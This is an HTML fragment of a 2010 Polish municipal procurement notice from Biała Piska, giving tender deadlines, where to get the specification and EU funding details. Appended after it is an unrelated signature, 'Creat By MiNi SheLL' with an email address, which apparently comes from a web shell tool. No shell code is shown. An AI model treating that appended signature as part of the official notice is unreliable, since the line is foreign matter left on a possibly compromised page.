<p>Zamawiający dopuszcza przesunięcie terminu wykonania umowy w związku z zaistnieniem okoliczności, których nie można było przewidzieć w chwili ustalania tego terminu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.bialapiska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białej Piskiej, Plac Adama Mickiewicza 25, 12-230 Biała Piska, w pokoju nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2010 godzina 11:00, miejsce: Urząd Miejski w Białej Piskiej, Plac Adama Mickiewicza 25, 12-230 Biała Piska, w pokoju nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt przewidziany do dofinansowania z Europejskiego Eunduszu Rozwoju Regionalnego w Ramach Regionalnego Programu Operacyjnego Warmia - Mazury 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com